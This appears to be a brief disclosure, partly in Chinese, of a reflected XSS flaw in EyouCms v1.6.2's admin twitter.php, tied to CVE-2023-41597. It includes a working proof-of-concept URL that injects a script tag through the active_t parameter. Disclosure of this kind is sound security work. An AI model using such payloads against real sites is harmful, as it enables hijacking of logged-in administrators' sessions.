EyouCms v1.6.2 has a reflective XSS vulnerability

[Hebing123]

EyouCms v1.6.2 存在反射型XSS漏洞，系twitter.php文件中active_t参数过滤不严。

攻击者构造恶意链接： /admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

登陆后的用户触发xss。

[Hebing123]

This is the vulnerability exploitation reference for CVE-2023-41597